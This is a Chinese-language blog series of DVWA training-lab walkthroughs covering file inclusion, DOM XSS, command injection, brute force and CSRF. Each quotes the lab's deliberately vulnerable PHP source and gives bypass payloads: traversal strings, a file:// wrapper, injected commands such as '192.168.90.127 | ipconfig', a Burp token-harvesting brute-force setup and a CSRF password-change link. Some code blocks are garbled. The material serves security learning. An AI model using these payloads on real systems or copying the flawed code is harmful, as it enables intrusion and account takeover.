DVWA靶场 on 知识带给我们自由

网络安全 DVWA通关指南 DVWA File Inclusion（文件包含）

Mon, 30 Sep 2024 12:23:22 +0000

DVWA File Inclusion（文件包含）

参考文献

WEB 安全靶场通关指南

本地文件包含(LFI)

文件包含漏洞的产生原因是 PHP 语言在通过引入文件时，引用的文件名，用户可控，由于传入的文件名没有经过合理的校验，或者校验被绕过，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。

当被包含的文件在服务器本地时，就形成的本地文件包含漏洞。

漏洞利用

利用条件：

（1）include()等函数通过动态变量的方式引入包含文件；（2）用户能够控制该动态变量。

远程文件包含(RFL)

服务器通过 PHP 的特性（函数）去包含任意文件时，由于要包含的这个文件来源过滤不严格，

从而可以去包含一个恶意文件，攻击者就可以远程构造一个特定的恶意文件达到攻击目的。

漏洞利用

条件： php.ini 中开启 allow_url_include 、 allow_url_fopen 选项。

修复建议

禁止远程文件包含 allow_url_include=off

配置 open_basedir=指定目录 ，限制访问区域。

过滤 ../ 等特殊符号

修改Apache日志文件的存放地址

开启魔术引号 magic_quotes_qpc=on

尽量不要使用动态变量调用文件，直接写要包含的文件。

Low

1、分析网页源代码

1
2
3
4
5
6


php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

没有任何过滤措施存在，同时使用GET方法传递参数。尝试查看file1.php文件

2、在URL输入不存在的路径，提交出现报错信息，得到文件的绝对路径

1
2
3


Warning: include(iviirjgiegij): failed to open stream: No such file or directory in D:\phpstudy_pro\WWW\DVWA-master\vulnerabilities\fi\index.php on line 36

Warning: include(): Failed opening 'iviirjgiegij' for inclusion (include_path='.;C:\php\pear;../../external/phpids/0.6/lib/') in D:\phpstudy_pro\WWW\DVWA-master\vulnerabilities\fi\index.php on line 36

3、使用相对路径访问fi.php，路径为D:\phpstudy_pro\WWW\DVWA-master\hackable\flags\fi.php。

相对路径计算如下：

1

..\..\hackable\flags\fi.php

成功访问到fi.php文件

Medium

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
// 使用str_replace函数移除$file字符串中所有的"http://"和"https://"子串。
$file = str_replace( array( "../", "..\"" ), "", $file );
// 继续使用str_replace函数，这次移除$file中所有向上一级目录的路径指示符，无论是"../"还是"..\"（考虑到不同操作系统的路径分隔符）。

?>

2、使用str_replace函数对输入的文件路径进行过滤，因为使用的是str_replace函数，所以可以使用双写绕过。构造Payload如下：

1

..././..././hackable/flags/fi.php

拼接到URL中提交，绕过成功

High

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
// 使用fnmatch函数检查$file是否匹配模式"file*"
// fnmatch用于实现shell风格的通配符匹配，这里的"file*"会匹配以"file"开头的任何字符串。
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

2、使用fnmatch函数函数，虽然只能包含"file"开头的文件，但我们可以使用file伪协议读取到文件。（这个地方需要文件的绝对路径，与Low级别不同，这里的报错信息需要提交以file开头的不存在文件或路径，否则会返回统一错误页面）

构造Payload如下：

1

file:///D:\phpstudy_pro\WWW\DVWA-master\hackable\flags\fi.php

拼接到URL中提交，包含文件成功

Impossible

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

网络安全 DVWA通关指南 DVWA DOM Based Cross Site Scripting (DOM型 XSS)

Sun, 29 Sep 2024 12:23:38 +0000

DVWA DOM Based Cross Site Scripting (DOM型 XSS)

参考文献

WEB 安全靶场通关指南

XSS跨站原理

当应用程序发送给浏览器的页面中包含用户提交的数据，但没有经过适当验证或转义时，就会导致跨站脚本漏洞。这个“跨”实际上属于浏览器的特性，而不是缺陷;

浏览器同源策略：只有发布Cookie的网站才能读取Cookie。

会造成Cookie窃取、劫持用户Web行为、结合CSRF进行针对性攻击等危害

DOM型

基于文档对象模型(Document Object Model)的一种漏洞；

DOM型与反射型类似，都需要攻击者诱使用户点击专门设计的URL；

Dom型 xss 是通过 url 传入参数去控制触发的；

Dom型返回页面源码中看不到输入的payload，而是保存在浏览器的DOM中。

Low

1、分析网页源代码

1
2
3
4
5
6


php

# No protections, anything goes

?>
//没有任何防御措施

2、修改default，在URL拼接Payload

Medium

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
	$default = $_GET['default'];
	
	# Do not allow script tags
	if (stripos ($default, ") !== false) {
		header ("location: ?default=English");
		exit;
	}
}

?>

增加对"

2、构造闭合"option"和"select"标签，执行弹出"/xss/“的语句

High

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

	# White list the allowable languages
	switch ($_GET['default']) {
		case "French":
		case "English":
		case "German":
		case "Spanish":
			# ok
			break;
		default:
			header ("location: ?default=English");
			exit;
	}
}

?>

2、在注入的 payload 中加入注释符 “#”，注释后边的内容不会发送到服务端，但是会被前端代码所执行。

1

(空格)#

Impossible

1
2
3
4
5
6


php

# Don't need to do anything, protction handled on the client side

?>
# 大多数情况下浏览器都会对 URL 中的内容进行编码，这会阻止任何注入的 JavaScript 被执行。

网络安全 DVWA通关指南 DVWA Command Injection（命令注入）

Sat, 28 Sep 2024 12:23:57 +0000

DVWACommand Injection（命令注入）

参考文献

WEB 安全靶场通关指南

Low

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


php

// 当表单提交按钮（Submit）被触发时执行以下代码
if (isset($_POST['Submit'])) {

    // 获取用户通过POST方式提交的IP地址数据
    // 注意：此处使用$_REQUEST可能会受到GET和POST两种方式的影响，为了安全性建议明确指定来源（如$_POST）
    $target = $_REQUEST['ip'];

    // 检查当前服务器的操作系统类型
    if (stristr(php_uname('s'), 'Windows NT')) {
        // 如果是Windows操作系统，则构建用于执行ping命令的字符串
        // 使用单引号包围命令并在末尾添加从用户输入获取的IP地址
        // 注意：这段代码存在命令注入风险，因为未对$user变量进行任何过滤或转义
        $cmd = shell_exec('ping ' . $target);
    } else {
        // 否则，认为是类*nix系统（Unix/Linux/Mac OS等）
        // 构建用于执行ping命令的字符串，'-c 4' 参数表示发送4个ICMP请求包
        // 同样，这段代码也存在命令注入风险
        $cmd = shell_exec('ping -c 4 ' . $target);
    }

    // 将执行命令的结果赋值给 $cmd 变量，并将其作为HTML预格式化的文本显示给用户
    // 这里展示了命令执行结果，但也暴露了潜在的安全风险
    $html .= "{$cmd}";
}

?>

2、网页对参数没有任何过滤，可以使用"&“、”&&“、”|“、”||“逻辑连接符连接命令，直接执行命令。

连接符左右是否有空格没有影响

注意逻辑连接符的区别

逻辑运算符	逻辑功能
&(并且)	有false则false
	(或者)
!(非)	非false则true，非true则false
^(异或)	相同为false，不同为true
&&(短路与)	有false则false,若&&左边表达式或者值为false则右边不进行计算

1
2
3
4


192.168.90.127 && ipconfig
192.168.90.127 & ipconfig
0.0.0.0 || ipconfig
192.168.90.127 | ipconfig

4、为了消除命令注入风险，需要对用户输入进行严格的过滤或转义。例如，可以使用escapeshellarg()函数对目标IP地址进行转义，如下所示：

1
2
3
4
5
6
7
8
9


// 对于Windows和*nix系统，都应先对用户输入进行转义
$target_sanitized = escapeshellarg($target);

// 然后构建命令
if (stristr(php_uname('s'), 'Windows NT')) {
    $cmd = shell_exec('ping ' . $target_sanitized);
} else {
    $cmd = shell_exec('ping -c 4 ' . $target_sanitized);
}

Medium

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


php

// 当检测到表单已提交（即点击了Submit按钮）时执行以下代码
if (isset($_POST['Submit'])) {

    // 获取用户通过POST方法提交的IP地址数据
    // 注意：这里使用$_REQUEST会同时接收GET和POST数据，若只期望POST数据，应使用$_POST['ip']
    $target = $_REQUEST['ip'];

    // 创建黑名单字符数组，其中包含了可能导致命令注入的特殊字符（在这里是逻辑运算符）
    $substitutions = array(
        '&&' => '', // 去除逻辑与符号，防止连续命令执行
        ';'  => '', // 去除分号，防止多条命令执行
    );

    // 使用str_replace函数替换掉用户输入中黑名单内的字符
    // 这是一个初级防护措施，但并不能完全阻止所有类型的命令注入攻击
    $target = str_replace(array_keys($substitutions), $substitutions, $target);

    // 检测当前服务器的操作系统类型
    if (stristr(php_uname('s'), 'Windows NT')) {
        // 如果是Windows操作系统，则执行ping命令
        $cmd = shell_exec('ping ' . $target);
    } else {
        // 否则，认为是类*nix系统（Unix/Linux/Mac OS等）
        // 执行带有-c参数的ping命令，表示向目标主机发送4个数据包
        $cmd = shell_exec('ping -c 4 ' . $target);
    }

    // 将ping命令的输出结果以HTML预格式化的文本形式呈现给用户
    // 虽然进行了部分字符过滤，但仍然需要注意此代码仍可能存在命令注入风险
    $html .= "{$cmd}";
}

?>

2、网页将”&&“连接符过滤了，可以使用其他的逻辑连接符，命令注入成功。

1
2
3


192.168.90.127 & ipconfig
0.0.0.0 || ipconfig
192.168.90.127 | ipconfig

High

1、分析网页源代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41


php

// 当检测到表单已提交（Submit按钮已被点击）时执行以下代码
if (isset($_POST['Submit'])) {

    // 获取用户提交的IP地址输入，并使用trim函数去除首尾空白字符
    $target = trim($_REQUEST['ip']);

    // 定义一个黑名单字符数组，包含一些可能用于命令注入的特殊字符
    $substitutions = array(
        '&'   => '',     // 空字符替换"&"（逻辑与符号，用于连接多个命令）
        ';'   => '',     // 空字符替换";"（命令分隔符，用于执行多条命令）
        '| '  => '',     // 空字符替换"| "（管道符号，用于命令间通信）！！！我真的没看到这里居然有一个空格！！！
        '-'   => '',     // 空字符替换"-"（某些命令中的选项标志或组合命令）
        '$'   => '',     // 空字符替换"$"（环境变量引用或bash命令执行）
        '('   => '',     // 空字符替换"("（子shell执行或命令组）
        ')'   => '',     // 空字符替换")"（与"("配套使用）
        '`'   => '',     // 空字符替换"`"（命令替换）
        '||'  => '',     // 空字符替换"||"（逻辑或符号，用于命令执行失败时执行下一条命令）
    );

    // 使用str_replace函数，将用户输入中黑名单内所有字符替换为空字符
    // 这是一种针对命令注入的基本防御措施，但无法保证完全抵御所有攻击手法
    $target = str_replace(array_keys($substitutions), $substitutions, $target);

    // 判断当前操作系统类型
    if (stristr(php_uname('s'), 'Windows NT')) {
        // 若是Windows操作系统，则执行ping命令
        $cmd = shell_exec('ping ' . $target);
    } else {
        // 否则，认为是类*nix系统（Unix/Linux/Mac OS等）
        // 执行带有-c参数的ping命令，表示向目标主机发送4个数据包
        $cmd = shell_exec('ping -c 4 ' . $target);
    }

    // 将ping命令执行的原始输出反馈给用户，以HTML预格式化的文本形式展示
    // 尽管进行了字符过滤，但此代码依然存在命令注入的风险
    $html .= "{$cmd}";
}

?>

2、真没想到黑名单字符数组中，’| ‘‘的后面多了一个空格，所以还是可以使用”|“连接符进行连接。

1

192.168.90.127 |ipconfig

Impossible

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56


php

// 当表单提交按钮（Submit）被触发时执行以下代码
if (isset($_POST['Submit'])) {

    // 验证Anti-CSRF令牌，防止跨站请求伪造攻击
    checkToken($_REQUEST['user_token'], $_SESSION['session_token'], 'index.php');

    // 获取用户输入的IP地址，并使用stripslashes函数去除反斜杠（\）以防止魔术引号攻击
    $target = $_REQUEST['ip'];
    $target = stripslashes($target);

    // 将IP地址拆分为四个八位字节（点分十进制形式）
    $octet = explode(".", $target);

    // 检查每个八位字节是否都是整数
    if (
        (is_numeric($octet[0])) &&
        (is_numeric($octet[1])) &&
        (is_numeric($octet[2])) &&
        (is_numeric($octet[3])) &&
        (sizeof($octet) == 4)
    ) {
        // 如果所有四个八位字节均为整数，则重新组合IP地址
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // 根据操作系统类型执行ping命令
        if (stristr(php_uname('s'), 'Windows NT')) {
            // 如果是Windows操作系统
            $cmd = shell_exec('ping ' . $target);
        } else {
            // 如果是*nix系统（如Unix/Linux/Mac OS）
            $cmd = shell_exec('ping -c 4 ' . $target);
        }

        // 将ping命令执行结果以HTML预格式化文本的形式返回给用户
        $html .= "{$cmd}";
    } else {
        // 用户输入的不是有效的IP地址，显示错误消息
        $html .= 'ERROR: You have entered an invalid IP.';
    }
}

// 生成新的Anti-CSRF令牌并存储到session中
generateSessionToken();

?>

**注释说明：**

- 此PHP脚本主要处理用户提交的IP地址，并执行ping命令检查其连通性。
- 使用`checkToken`函数验证用户提交的Anti-CSRF令牌，确保请求来自合法用户而非第三方恶意伪造。
- 获取用户输入的IP地址，并通过`stripslashes`函数移除可能存在的反斜杠，以防止SQL注入或其他基于字符串逃逸的攻击。
- 将IP地址拆分成四个八位字节，然后逐一检查它们是否为数字，确保IP地址格式正确。
- 根据服务器操作系统类型执行相应的ping命令，并将结果显示给用户。
- 在脚本末尾调用`generateSessionToken`函数生成新的Anti-CSRF令牌，为后续请求提供保护。

网络安全 DVWA通关指南 DVWA Brute Force (爆破)

Fri, 27 Sep 2024 12:24:23 +0000

DVWA Brute Force (爆破)

参考文献

WEB 安全靶场通关指南

Low

1、分析网页源代码

php

// 检查是否存在"Login" GET 参数，这通常是提交登录表单后触发的动作
if( isset( $_GET[ 'Login' ] ) ) {

    // 获取POST方式提交的用户名
    $user = $_GET[ 'username' ]; // 注意：这里应当使用 $_POST 而非 $_GET 来获取表单数据，因为登录通常涉及敏感信息，推荐使用 POST 方法

    // 获取POST方式提交的密码，并使用md5函数对其进行哈希加密（注意：MD5已经不再安全，应使用更安全的加密算法如bcrypt）
    $pass = $_GET[ 'password' ]; // 同上，此处应改为 $_POST['password']
    $pass = md5( $pass ); // 这里假设密码在数据库中是以MD5形式存储的

    // 创建SQL查询语句，检查数据库中是否存在匹配的用户名和密码
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

    // 执行SQL查询，连接数据库并处理潜在错误
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( 
        '' . 
        ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : 
        (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . 
        '
'
    );

    // 检查查询结果是否成功且只有一条记录匹配（意味着用户名和密码正确）
    if( $result && mysqli_num_rows( $result ) == 1 ) {

        // 获取匹配用户的详细信息
        $row = mysqli_fetch_assoc( $result );
        
        // 提取用户头像URL
        $avatar = $row["avatar"];

        // 登录成功，构造欢迎消息并显示用户头像
        $html .= "Welcome to the password protected area {$user}
";
        $html .= "\"{$avatar}\" />"; // 显示用户的头像图片

    } else {

        // 登录失败，输出错误提示信息
        $html .= "
Username and/or password incorrect.
";

    }

    // 关闭数据库连接
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

} // 结束 if(isset($_GET['Login']))

?>

2、使用管理员admin登录，密码尝试123，提示错误

使用Burp Suite抓包，将数据包发给Intruder（测试器），选择Sniper（狙击手）模式，选择password为有效载荷。

单字典(只有一个字典) 1.Sniper：按顺序一个一个参数依次遍历。 2.Battering ram：每个参数同时遍历同一个字典，两个参数的值相同。

多字典(有多少参数就有多少字典） 1.Pitchfork：多个参数同时进行遍历，只是一个选字典1，一个选字典2（相当于50m赛跑同时出发，只是赛道不同，互不干扰。爆破次数取决于最短的字典长度） 2.Cluster bomb：有点像两个嵌套的for循环，参数i和参数j，i=0，然后j要从0-10全部跑完，然后i=1，然后j再从0-10跑完，一对多，多次遍历

使用字典进行爆破，字典可以自己制作，也可以网上直接下载，等待片刻爆破完成，使用爆破出的密码就能登录。

Medium

1、分析网页源代码

php

if( isset( $_GET[ 'Login' ] ) ) {
	// Sanitise username input
	$user = $_GET[ 'username' ];
	$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

	// Sanitise password input
	$pass = $_GET[ 'password' ];
	$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass = md5( $pass );

	// Check the database
	$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' );

	if( $result && mysqli_num_rows( $result ) == 1 ) {
		// Get users details
		$row    = mysqli_fetch_assoc( $result );
		$avatar = $row["avatar"];

		// Login successful
		$html .= "Welcome to the password protected area {$user}
";
		$html .= "\"{$avatar}\" />";
	}
	else {
		// Login failed
		sleep( 2 ); // 当登录验证失败时界面将睡眠 2 秒
		$html .= "
Username and/or password incorrect.
";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

2、密码验证方面，增加验证失败睡眠两秒的限制，这会加大爆破所需要的时间。但只要时间充足，爆破出密码不是问题。

试了一下，果然很慢。

High

1、分析网页源代码

php

if( isset( $_GET[ 'Login' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Sanitise username input
	$user = $_GET[ 'username' ];
	$user = stripslashes( $user );
	$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

	// Sanitise password input
	$pass = $_GET[ 'password' ];
	$pass = stripslashes( $pass );
	$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass = md5( $pass );

	// Check database
	$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' );

	if( $result && mysqli_num_rows( $result ) == 1 ) {
		// Get users details
		$row    = mysqli_fetch_assoc( $result );
		$avatar = $row["avatar"];

		// Login successful
		$html .= "Welcome to the password protected area {$user}
";
		$html .= "\"{$avatar}\" />";
	}
	else {
		// Login failed
		sleep( rand( 0, 3 ) );
		$html .= "
Username and/or password incorrect.
";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

2、进入Position模块，选择Attacktype为Pitchfork模式，选择password和user_token为爆破对象

进入Resource Pool模块，

进入Options模块，找到Grep - Extract选项卡，添加一个正则表达式匹配返回的user_token

点击Refetch response，从response中找到user_token并选中

载入字典

第二个参数"token"选择从返回包匹配，填入当前token

爆破成功，登录成功

Impossible

php

if( isset( $_POST[ 'Login' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Sanitise username input
	$user = $_POST[ 'username' ];
	$user = stripslashes( $user );
	$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

	// Sanitise password input
	$pass = $_POST[ 'password' ];
	$pass = stripslashes( $pass );
	$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass = md5( $pass );

	// Default values
	$total_failed_login = 3;
	$lockout_time       = 15;
	$account_locked     = false;

	// Check the database (Check user information)
	$data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
	$data->bindParam( ':user', $user, PDO::PARAM_STR );
	$data->execute();
	$row = $data->fetch();

	// Check to see if the user has been locked out.
	if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
		// User locked out.  Note, using this method would allow for user enumeration!
		//$html .= "
This account has been locked due to too many incorrect logins.";

		// Calculate when the user would be allowed to login again
		$last_login = $row[ 'last_login' ];
		$last_login = strtotime( $last_login );
		$timeout    = strtotime( "{$last_login} +{$lockout_time} minutes" );
		$timenow    = strtotime( "now" );

		// Check to see if enough time has passed, if it hasn't locked the account
		if( $timenow > $timeout )
			$account_locked = true;
	}

	// Check the database (if username matches the password)
	$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
	$data->bindParam( ':user', $user, PDO::PARAM_STR);
	$data->bindParam( ':password', $pass, PDO::PARAM_STR );
	$data->execute();
	$row = $data->fetch();

	// If its a valid login...
	if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
		// Get users details
		$avatar       = $row[ 'avatar' ];
		$failed_login = $row[ 'failed_login' ];
		$last_login   = $row[ 'last_login' ];

		// Login successful
		$html .= "Welcome to the password protected area {$user}
";
		$html .= "\"{$avatar}\" />";

		// Had the account been locked out since last login?
		if( $failed_login >= $total_failed_login ) {
			$html .= "Warning: Someone might of been brute forcing your account.
";
			$html .= "Number of login attempts: {$failed_login}.
Last login attempt was at: ${last_login}.
";
		}

		// Reset bad login count
		$data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
		$data->bindParam( ':user', $user, PDO::PARAM_STR );
		$data->execute();
	}
	else {
		// Login failed
		sleep( rand( 2, 4 ) );

		// Give the user some feedback
		$html .= "
Username and/or password incorrect.

Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.
";

		// Update bad login count
		$data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
		$data->bindParam( ':user', $user, PDO::PARAM_STR );
		$data->execute();
	}

	// Set the last login time
	$data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
	$data->bindParam( ':user', $user, PDO::PARAM_STR );
	$data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

网络安全 DVWA通关指南 Cross Site Request Forgery (CSRF)

Thu, 26 Sep 2024 12:24:47 +0000

DVWA Cross Site Request Forgery (CSRF)

参考文献

WEB 安全靶场通关指南

CSRF是跨站请求伪造攻击，由客户端发起，是由于没有在执行关键操作时，进行 是否由用户自愿发起的 确认攻击者通过用户的浏览器来注入额外的网络请求，来破坏一个网站会话的完整性。

比如某网站 用户信息修改 功能，没有验证Referer也没添加Token，攻击者可以用HTML构造恶意代码提交POST请求，诱骗已经登陆的受害者点击，可以直接修改用户信息

修复建议

验证Referer

添加token

DVWA Low 级别 CSRF

0、分析网页源代码（路径：“D:\phpstudy_pro\DVWA-master\vulnerabilities\csrf\source\low.php”）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34


php

if(isset($_GET['Change'])) { // 检查是否有请求更改密码的动作
    // 获取用户输入的新密码和确认密码
    $pass_new  = $_GET['password_new'];
    $pass_conf = $_GET['password_conf'];

    // 检查两次输入的密码是否匹配
    if ($pass_new == $pass_conf) { 
        // 密码匹配
        // 防止SQL注入，转义新密码字符串
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        
        // 对新密码进行MD5哈希加密（注意：MD5加密在此处已经过时，不建议用于存储密码）
        $pass_new = md5($pass_new);

        // 构造SQL更新语句，更新当前登录用户（由dvwaCurrentUser()函数获取）的密码
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";

        // 执行SQL查询
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert) or die('' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '');

        // 如果密码成功更改，则反馈给用户
        $html .= "Password Changed.";
    } else {
        // 如果两次输入的密码不匹配，则反馈错误信息
        $html .= "Passwords did not match.";
    }

    // 关闭数据库连接
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

1、选择DVWA的CSRF，修改密码为111，提交后观察到网站链接发生变化

1

http://dvwa/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change#

观察链接，认为使用get方式提交修改密码参数，只要三个参数符合就可以执行密码修改的操作

2、打开一个新标签页，在地址栏输入 http://dvwa/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change# ，回车后，进入DVWA中并提示Password Changed，修改密码成功。

3、可以通过将长连接转换为短链接的方法，诱使用户点击链接，通过在线工具转换

DVWA Medium 级别 CSRF

0、分析网页源代码（路径：“D:\phpstudy_pro\DVWA-master\vulnerabilities\csrf\source\medium.php”）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37


php

if( isset( $_GET[ 'Change' ] ) ) {
	// Checks to see where the request came from
    //检查$_SERVER['HTTP_REFERER']，看看请求是否来自包含当前服务器名称$_SERVER['SERVER_NAME']的地址。stripos函数用于查找HTTP_REFERER是否包含服务器名
	if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
		// Get input
		$pass_new  = $_GET[ 'password_new' ];
		$pass_conf = $_GET[ 'password_conf' ];

		// Do the passwords match?
		if( $pass_new == $pass_conf ) {
			// They do!
			$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
			$pass_new = md5( $pass_new );

			// Update the database
			$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
			$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );

			// Feedback for the user
			$html .= "Password Changed.";
		}
		else {
			// Issue with passwords matching
			$html .= "Passwords did not match.";
		}
	}
	else {
		// Didn't come from a trusted source
		$html .= "That request didn't look correct.";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

1、尝试修改密码为222，修改成功，得到链接

1

http://dvwa/vulnerabilities/csrf/?password_new=222&password_conf=222&Change=Change#

2、打开新的标签页，使用上面的地址，出现错误提示，密码修改错误

3、打开计算机代理，修改电脑代理服务器IP设置为127.0.0.1，端口设置为8888，BurpSuite调整代理参数与电脑代理一致

4、正常修改密码的网页，使用BurpSuitePro捕获流量包，发现多出Referer属性信息

5、而直接粘贴链接修改密码失败的报文缺少Referer属性信息，右键选择Send to Repeater

5、打开Repeater选项卡，给Request请求中添加Referer信息，Referer需要包括"dvwa"字段（需要符合同源策略），点击Send发送，修改密码成功

DVWA High 级别 CSRF

0、分析网页源代码（路径：“D:\phpstudy_pro\DVWA-master\vulnerabilities\csrf\source\high.php”）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


php

